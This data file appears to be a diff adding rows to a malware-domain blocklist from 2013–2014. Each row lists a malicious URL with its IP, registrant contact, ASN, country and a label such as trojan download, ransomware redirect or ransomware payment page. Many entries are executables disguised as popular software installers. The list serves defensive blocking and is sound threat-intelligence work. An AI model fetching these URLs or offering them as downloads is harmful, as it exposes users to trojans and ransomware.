+"2013/12/03_08:36","www.lostartofbeingadame.com/wp-content/plugins/www.fotosupload.php","70.88.182.38","-","redirects to trojan download","-","7725","0","US", +"2013/12/03_08:36","bride1.com/File/www.fotosupload.com/fotosuploadcominfidelidadfotos2dediciembreparaquenoquedendudasc.zip","216.151.221.238","-","trojan inside zip file","-","13768","0","US", +"2014/03/11_22:39","somethingnice.hc0.me/login.php","5.135.127.68","-","PlasmaRAT ACP","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2014/03/11_22:39","somethingnice.hc0.me/Miner/YACMiner.files","5.135.127.68","-","Trojan.PlasmaRAT","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2013/12/09_09:45","europol.europe.eu.id214218540-7444056787.h5841.com/?flow_id=2000&870470=33440/case_id=17188","193.169.87.247","-","Leads to ransomware","Registrar Abuse Contact abuse@bizcn.com","48031","0","UA", +"2013/12/09_09:45","europol.europe.eu.france.id647744160-2176514326.h5841.com/?flow_id=8615&511004=52895/case_id=27223","193.169.87.247","-","Ransomware","Registrar Abuse Contact abuse@bizcn.com","48031","0","UA", +"2013/12/09_09:45","z7752.com/checkout.php?step=1","195.191.56.113","-","Ransomware payment processor","Registrar Abuse Contact abuse@bizcn.com","50395","0","UA", +"2013/12/09_09:52","mobatory.com/8jxjj7ifv3055xytz5ih3o130iar6rf9","78.140.142.186","-","Leads to ransomware","Registrar Abuse Contact abuse@publicdomainregistry.com","35415","0","NL", +"2013/12/09_09:52","trahic.ru/5ebydvkrgw04am7wjly","78.140.142.178","-","Leads to ransomware","-","35415","0","NL", +"2013/12/09_09:52","trahic.ru/6h3m0gs9sgb81g8h0hdefhh9a?zhkk4a8gv=1","78.140.142.178","-","Leads to ransomware","-","35415","0","NL", +"2013/12/09_09:52","trahic.ru/5mm3i7t83m2t8dlja","78.140.142.178","-","Leads to ransomware","-","35415","0","NL", +"2013/12/09_09:52","trahic.ru/6h3m0gs9sgb8vxr70voqj1fa6?","78.140.142.186","-","Leads to 
ransomware","-","35415","0","NL", +"2013/12/09_10:17","mobatory.com/5bj0eswiecc78rvp3egufo5xossn1segz4653xhs4?37o78=46se8http%2F%3F%3Ftrahic.ru%3F6h3m0gs9sgb8vxr70voqj1fa6?&j68ljm=&6b42bbis=t85660263&pqsubf2hr=1","78.140.142.178","-","Leads to ransomware","Registrar Abuse Contact abuse@publicdomainregistry.com","35415","0","NL", +"2013/12/09_10:22","vroll.net","78.140.142.165","-","Leads to ransomware","Registrar Abuse Contact abuse@publicdomainregistry.com","35415","0","NL", +"2013/12/09_10:22","mobatory.com/70i1sxn6q8s86lqb6tfkgdehq","78.140.142.178","-","Leads to ransomware","Registrar Abuse Contact abuse@publicdomainregistry.com","35415","0","NL", +"2013/12/09_10:57","mobatory.com/7jwgzo2ub186py0imhspqlfoe","78.140.142.178","-","Leads to ransomware","Registrar Abuse Contact abuse@publicdomainregistry.com","35415","0","NL", +"2013/12/09_10:57","mobatory.com/5uxfljc5z4s6eacz305ic45h25hq3srib5tc1b51g?j8c=49ljg&pjz9ci=rapid8.com/&3kgiokr8=t3619158&80ipnpaegcqj19=rapid8.com/stage2.php&4kf7k=0&31n33=0&3ea6o=0&3cvlt=0&wr71g34ni=1&127ehq780r=0&6s89o644imz=0&78ob3sh84zkh1z=1&6iu2mhp1=0&rpo5za53h=1024&yq84eazbm=768&8v0luzzkqq3=0&6s5iunzsdhm2mj30=1","78.140.142.178","-","Leads to ransomware","Registrar Abuse Contact abuse@publicdomainregistry.com","35415","0","NL", +"2013/12/09_10:57","mobatory.com/5uxfljc5z4s6eacz305ic45h25hq3srib5tc1b51g?j8c=49ljg&pjz9ci=rapid8.com/&3kgiokr8=t3619158&80ipnpaegcqj19=rapid8.com/stage2.php&4kf7k=0&31n33=0&3ea6o=0&3cvlt=0&wr71g34ni=1&127ehq780r=0&6s89o644imz=0&78ob3sh84zkh1z=1&6iu2mhp1=0&rpo5za53h=1024&yq84eazbm=768&8v0luzzkqq3=0&7uyedgxpbuv6y8kxg34cuxdmz=99780&98uca7ro8qv6eu5qpnguteh6r=","78.140.142.186","-","Leads to ransomware","Registrar Abuse Contact abuse@publicdomainregistry.com","35415","0","NL", +"2013/12/09_11:11","amu.brandnewinstall.info/yaelmendel/gadget/","162.210.192.9","-","Leads to Win32/InstallRex","BRANDNEWINSTALL.INFO@domainsbyproxy.com","30633","0","US", 
+"2013/12/09_11:11","amu.helpyourselfinstall.info/iframe/?d=1271","162.210.192.5","-","Leads to Win32/InstallRex","HELPYOURSELFINSTALL.INFO@domainsbyproxy.com","30633","0","US", +"2013/12/09_11:11","amu.twobox4addon.info/rachel/","162.210.192.5","-","Leads to Win32/InstallRex","TWOBOX4ADDON.INFO@domainsbyproxy.com","30633","0","US", +"2013/12/09_11:11","amu.helpyourselfinstall.info/iframe/?d=1118","162.210.192.5","-","Leads to Win32/InstallRex","HELPYOURSELFINSTALL.INFO@domainsbyproxy.com","30633","0","US", +"2013/12/09_11:19","amu.adduraddonhere.info/lpgreenseal/","141.101.117.61","-","Leads to Win32/InstallRex","ADDURADDONHERE.INFO@domainsbyproxy.com","13335","0","EU", +"2013/12/09_11:19","amu.boxinstallercompany.info/iframe/?d=746","162.210.192.9","-","Leads to Win32/InstallRex","BOXINSTALLERCOMPANY.INFO@domainsbyproxy.com","30633","0","US", +"2013/12/12_10:10","-","31.220.3.68/www/","dedicated.koddos.com.","Java drive-by","-","199636","0","DE", +"2013/12/12_10:10","-","31.220.3.68/www/BotLoader.exe","dedicated.koddos.com.","Trojan.Atrax","-","199636","0","DE", +"2013/12/12_10:24","-","31.220.3.68/www/BotLoader.exe","dedicated.koddos.com.","Trojan.Atrax","-","199636","0","DE", +"2013/12/12_10:24","-","31.220.3.68/www/402022Rechnung.PDF.exe","dedicated.koddos.com.","Trojan","-","199636","0","DE", +"2013/12/12_10:24","-","31.220.3.68/www/StealerDllx86.dll_raw","dedicated.koddos.com.","Trojan.PWS","-","199636","0","DE", +"2013/12/19_16:43","directxex.com/uploads/1201296916.8h.exe","108.162.198.96","-","Backdoor.Bot","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1251104917.p9g.exe","108.162.199.96","-","Trojan.Zbot.CXgen","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1353613345.ih.exe","108.162.199.96","-","Trojan.IRCbot","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", 
+"2013/12/19_16:43","directxex.com/uploads/143265795.ohi.exe","108.162.199.96","-","Trojan.Ircbot.SI","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1565397800.9g.exe","108.162.199.96","-","Trojan.Zbot.CXgen","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/158511922.uf.exe","108.162.198.96","-","Trojan.IRCbot","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1607796965.id100.exe","108.162.198.96","-","Trojan.Agent","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1836606807.9g.exe","108.162.198.96","-","Trojan.FakeMIRC","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1853928844.97g.exe","108.162.198.96","-","Trojan.Zbot.CXgen","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1991519040.aeg.exe","108.162.199.96","-","Trojan.Ircbot.SI","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/223478294.insid-start-sjw.exe","108.162.199.96","-","Trojan.Agent.MNR","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/232683212.igi.exe","108.162.199.96","-","Trojan.Agent.DE","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/31401351.final5.exe","108.162.199.96","-","Trojan.Agent.AI","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/384011806.gotter.exe","108.162.199.96","-","Trojan.LVBP","Admin 
6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/414294618.009.exe","108.162.199.96","-","Trojan.Inject","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/609015994.mining.exe","108.162.199.96","-","Backdoor.MSIL.P","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/620509324.MINIMON.exe","108.162.199.96","-","Trojan.MSIL","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/623307317.inst.exe","108.162.198.96","-","Trojan.Agent","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/636954784.ok.exe","108.162.198.96","-","Trojan.Agent.DEED","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/662268336.BIN.exe","108.162.198.96","-","Trojan.Napolar","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/687255529.delfi.exe","108.162.198.96","-","Trojan.Inject","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/744646896.rbsrb.exe","108.162.198.96","-","Trojan.Zbot.CXgen","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/777724411.safetyCheck.exe","108.162.198.96","-","Trojan.Agent.AI","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/818611823.insidrazor.exe","108.162.198.96","-","Trojan.Autoit","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", 
+"2013/12/19_16:43","directxex.com/uploads/836587333.skp.exe","108.162.198.96","-","Trojan.Ircbot.SI","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/845426478.xa.exe","108.162.199.96","-","Trojan.FakeMIRC","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/90200102.neusteBotLoader.exe","108.162.199.96","-","Backdoor.Bot.Tor","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/995578741.miner.exe","108.162.199.96","-","Trojan.MSIL","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1744698061.miner.txt","108.162.199.96","-","Trojan.MSIL","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/281742754.abbba.exe","108.162.199.96","-","Win32/Injector.ATSD trojan","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/566077266.ms.exe","108.162.199.96","-","Win32/Injector.Autoit.VH trojan","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1347878398.miner2.exe","108.162.199.96","-","MSIL/CoinMiner.CV trojan","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1565998043.test.exe","108.162.199.96","-","Trojan..HKWQREW","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/2111586998.onoj.exe","108.162.198.96","-","Win32/Injector.ATFB trojan","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", 
+"2013/12/19_16:43","directxex.com/uploads/566077266.ms.exe?dl=1","108.162.198.96","-","Win32/Injector.Autoit.VH trojan","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/20_15:23","down2.feiyang163.com/soft/wavtomp3.exe","211.101.12.49","-","Trojan.Android","-","4808","0","CN", +"2013/12/20_15:23","down3.feiyang163.com/soft/fcssq.exe","211.101.12.49","-","Trojan.Android","-","4808","0","CN", +"2013/12/20_15:23","d1.kuai8.com/setup/kuai8_zjy.exe","61.158.145.141","141.145.158.61.ha.cnc.","Trojan.Backdoor","-","4837","0","CN", +"2013/12/20_15:23","down.unadnet.com.cn/soft/2Dmofang.exe","211.101.12.49","-","Trojan.Chad","Registrant Contact microsword@sohu.com / Registrant Contact microsword@sohu.com","4808","0","CN", +"2013/12/20_15:23","down.unadnet.com.cn/soft/loveletter.exe","211.101.12.49","-","Trojan.Chad","Registrant Contact microsword@sohu.com / Registrant Contact microsword@sohu.com","4808","0","CN", +"2013/12/20_15:23","ddd.gouwuke.cn/down/exejmman.exe","211.101.12.49","-","Trojan.Delf","Registrant Contact cnlindehua@sohu.com / Registrant Contact cnlindehua@sohu.com","4808","0","CN", +"2013/12/20_15:23","-","211.101.12.49/dls/axuip.exe","-","Trojan.Downloader","-","4808","0","CN", +"2013/12/20_15:23","-","211.101.12.49/dls/axujp.exe","-","Trojan.Downloader","-","4808","0","CN", +"2013/12/20_15:23","down.feiyang163.com/soft/alexacha.exe","211.101.12.49","-","Trojan.Downloader","-","4808","0","CN", +"2013/12/20_15:23","down.feiyang163.com/soft/usblock.exe","211.101.12.49","-","Trojan.Downloader","-","4808","0","CN", +"2013/12/20_15:23","down.feiyang163.com/soft/wbjfsys.exe","211.101.12.49","-","Trojan.Downloader","-","4808","0","CN", +"2013/12/20_15:23","down.guangsu.cn/qdn/setup_qd262.exe","121.63.179.184","-","Trojan.Dropper","Registrant Contact lovermy@qq.com / Registrant Contact lovermy@qq.com","4134","0","CN", 
+"2013/12/20_15:23","down.guangsu.cn/qdn/setup_qd304.exe","122.225.106.101","-","Trojan.Dropper","Registrant Contact lovermy@qq.com / Registrant Contact lovermy@qq.com","4134","0","CN", +"2013/12/20_15:23","www.sj88.com/hezi/jm/s1000.exe","202.97.174.68","-","Trojan.Dropper","Registrant NAMENIC@GMAIL.COM","4837","0","CN", +"2013/12/20_15:23","k.h.a.d.free.fr/pub/utils/oepv.exe","212.27.63.102","perso102-g5.free.fr.","Trojan.Emogen.U","hostmaster@proxad.net","12322","0","FR", +"2013/12/20_15:23","-","211.101.12.49/dls/axujo.exe","-","Trojan.SelfDel","-","4808","0","CN", +"2013/12/20_15:23","download.grandcloud.cn/9291/15474/setup_2949-14598.exe","211.147.13.224","-","Trojan.Symmi","Registrant Contact liuzuyong@snda.com / Registrant Contact liuzuyong@snda.com","17431","0","CN", +"2013/12/20_15:23","download.grandcloud.cn/9291/16411/80347_al.exe","58.215.169.42","-","Trojan.Symmi","Registrant Contact liuzuyong@snda.com / Registrant Contact liuzuyong@snda.com","4134","0","CN", +"2013/12/20_15:23","download.grandcloud.cn/9291/17147/cool_ES_PC35152730.exe","58.215.169.42","-","Trojan.Symmi","Registrant Contact liuzuyong@snda.com / Registrant Contact liuzuyong@snda.com","4134","0","CN", +"2013/12/20_15:23","www.feiyang163.com/soft/fySpeaker.exe","211.101.12.49","-","Win32/Trojan.Backdoor","-","4808","0","CN", +"2013/12/20_15:23","thefxarchive.com/Downloads/WLMM/MMK_Warp_Variations.exe","98.131.172.1","rev.opentransfer.com.1.172.131.98.in-addr.arpa.","Win32/Trojan.Genome","Registrant MIKESTVTIPS@YAHOO.COM","32392","0","US", +"2013/12/20_15:23","formessengers.com/download.php?PN=MLP","72.167.131.157","p3slh193.shr.phx3.secureserver.net.","Win32/Trojan.Injects","-","26496","0","US", +"2013/12/20_15:23","dl.microsword.net/softdown/filerubber.exe","211.101.12.49","-","Win32/Trojan.Pasta.h","-","4808","0","CN", +"2013/12/20_15:23","dl.microsword.net/Softdown/VideoRecord.exe","211.101.12.49","-","Win32/Trojan.Pasta.h","-","4808","0","CN", 
+"2013/12/20_15:23","download.56.com/lp/client/update.lua","59.32.213.195","195.213.32.59.broad.sg.gd.dynamic.163data.com.cn.","Win32/Trojan.Spy","-","4134","0","CN", +"2013/12/20_15:23","download.56.com/lp/client/woxiu1.0.15_20119070.exe","59.32.213.195","195.213.32.59.broad.sg.gd.dynamic.163data.com.cn.","Win32/Trojan.Spy","-","4134","0","CN", +"2013/12/20_15:23","download.ttrili.com:98/Setup%5B57%5D-rl.exe","223.244.255.16","-","Win32/Trojan.Spy","chaofan lin 75146226@qq.com","4134","0","CN", +"2013/12/20_15:23","download.ttrili.com:98/Setup%5B75%5D-rl.exe","117.28.254.156","-","Win32/Trojan.Spy","chaofan lin 75146226@qq.com","4134","0","CN", +"2013/12/20_15:23","download.ttrili.com:98/setup%5B79%5D-rl.exe","117.28.254.156","-","Win32/Trojan.Spy","chaofan lin 75146226@qq.com","4134","0","CN", +"2013/12/20_15:23","download.ttrili.com:98/Setup[11]-rl.exe","117.28.254.156","-","Win32/Trojan.Spy","chaofan lin 75146226@qq.com","4134","0","CN", +"2013/12/20_15:23","f.gj555.net/download/setups30035.exe","118.26.178.5","-","Win32/Trojan.Spy","cao jiajia / 58604788@qq.com","4808","0","CN", +"2013/12/20_15:23","f.gj555.net/download/setups30138.exe","118.26.178.5","-","Win32/Trojan.Spy","cao jiajia / 58604788@qq.com","4808","0","CN", +"2013/12/20_15:23","f.gj555.net/download/setups34338.exe","118.26.178.5","-","Win32/Trojan.Spy","cao jiajia / 58604788@qq.com","4808","0","CN", +"2013/12/20_15:23","f.gj555.net/download/setups75613.exe","118.26.178.5","-","Win32/Trojan.Spy","cao jiajia / 58604788@qq.com","4808","0","CN", +"2013/12/20_15:23","f.gj555.net/download/setups83563.exe","118.26.178.5","-","Win32/Trojan.Spy","cao jiajia / 58604788@qq.com","4808","0","CN", +"2013/12/20_15:23","f.gj555.net/download/setups91646.exe","118.26.178.5","-","Win32/Trojan.Spy","cao jiajia / 58604788@qq.com","4808","0","CN", +"2013/12/20_15:23","f.gj555.net/download/setups95191.exe","118.26.178.5","-","Win32/Trojan.Spy","cao jiajia / 58604788@qq.com","4808","0","CN", 
+"2013/12/20_15:23","files.dsnetwb.com/aTube_Catcher_5188_ATU3.exe","174.37.194.151","sky.dsnetwb.com.","Win32/Trojan.Spy","-","36351","0","US", +"2013/12/20_15:23","www.zctei.com/date/9377chiyue_Y_Cdcr1124.exe","122.225.107.85","-","Win32/Trojan.Spy","ythappyboy@163.com","4134","0","CN", +"2014/03/11_22:39","somethingnice.hc0.me/Miner/Ufasoft.files","5.135.127.68","-","Trojan.PlasmaRAT","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2014/02/07_09:44","www.t-gas.co.uk/1.txt","212.227.26.21","-","Leads to exploit at jolygoestobeinvester.ru","Gordon Potts / -","8560","0","DE", +"2014/02/07_08:25","www.zatzy.com/allmaent/391854-volvos-nya-drive-e.html","81.201.217.115","-","compromised site leads to exploit kit","Registrar Abuse Contact abuse@ascio.com","41175","0","SE", +"2013/12/29_17:53","aippnetworks.com/plugins/authentication/joomla/aviancataca/aviancatacafreeticket.php","195.74.65.196","195-74-65-196.ip.aleto.nl.","Redirects to Trojan","Registrant sloopymikegyamfi@gmail.com","25459","0","NL", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/2629037/manual-de-configuración-del-putty.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/11975718/ultrasurf+13.03.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/11999301/Silver+TV+3.0.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/7412352/BTV+Solo.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", 
+"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11433792/Automation+Studio+6.0.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11649331/Super+Mario+Sunshine+64+1.0.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/12050993/Free+RAR+Extract+Frog.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.24.1/12015256/Windows+Product+Key+Code+Finder+2.20.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.24.1/12015430/NT+Key+Enterprise+Edition+3.80.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/12023961/Microsoft+Hesap+Makinesi++.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/4789416/LogiEscalierExpert.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/11630753/iniciación-a-la-soldadura-con-estaño.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/11812852/n5239.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/11358561/notepad+++.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", 
+"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/11707102/psx0139.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/11707353/psx0046.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/1033/poweriso.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11431055/dragon+naturally+speaking+9.0.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11431361/who+anthro+3.2.2.1.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/2269383/roadnav.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/2836178/gambas+a+la+egipcia.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/5345299/vietkey.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/5349388/adfender.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/5366358/mediaget.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", 
+"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/5366255/flv_media_player.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/5830397/matlab.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/6445693/calibre.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/6773557/odin3.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11433792/AutomationStudio6.0.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11649331/SuperMarioSunshine641.0.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/12050993/FreeRARExtractFrog.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/7412352/BTVSolo.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.24.1/4790826/Handball+Challenge.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/4812448/pointage+d%E2%80%99heures.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", 
+"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/5347935/wondershare+pdf+to+word.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/11999301/SilverTV3.0.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.24.1/12015256/WindowsProductKeyCodeFinder2.20.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.24.1/12015430/NTKeyEnterpriseEdition3.80.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/5331438/FLV_Media_Player.exe=0D=0Ahttp:/grandinstalls.ru/RlpaXhQBAUhBXE1LXQBMW1cDSEdCSwBcWwFJS1pxVkNCEUhHQktxR0oT/torrent/147458862/498349280/torrent.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/12014376/Setup.exe=0D=0Ahttp:/dl.softpzivrubajjui.net/n/3.0.26.2/5565169/FLVMPlayer.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", 